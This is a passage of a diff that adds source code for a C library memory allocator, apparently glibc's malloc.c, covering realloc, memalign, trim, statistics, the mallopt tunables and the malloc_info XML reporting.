+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  if (__glibc_unlikely (chunksize(p) != prevsize))
+	    malloc_printerr ("corrupted size vs. prev_size in fastbins");
+	  unlink_chunk (av, p);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink_chunk (av, nextchunk);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink_chunk (av, next);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+	      memcpy (newmem, chunk2mem (oldp), oldsize - SIZE_SZ);
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static __always_inline int
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static __always_inline int
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static __always_inline int
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static __always_inline int
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static __always_inline int
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static __always_inline int
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static __always_inline int
+do_set_tcache_count (size_t value)
+{
+  if (value <= MAX_TCACHE_COUNT)
+    {
+      LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+      mp_.tcache_count = value;
+    }
+  return 1;
+}
+
+static __always_inline int
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
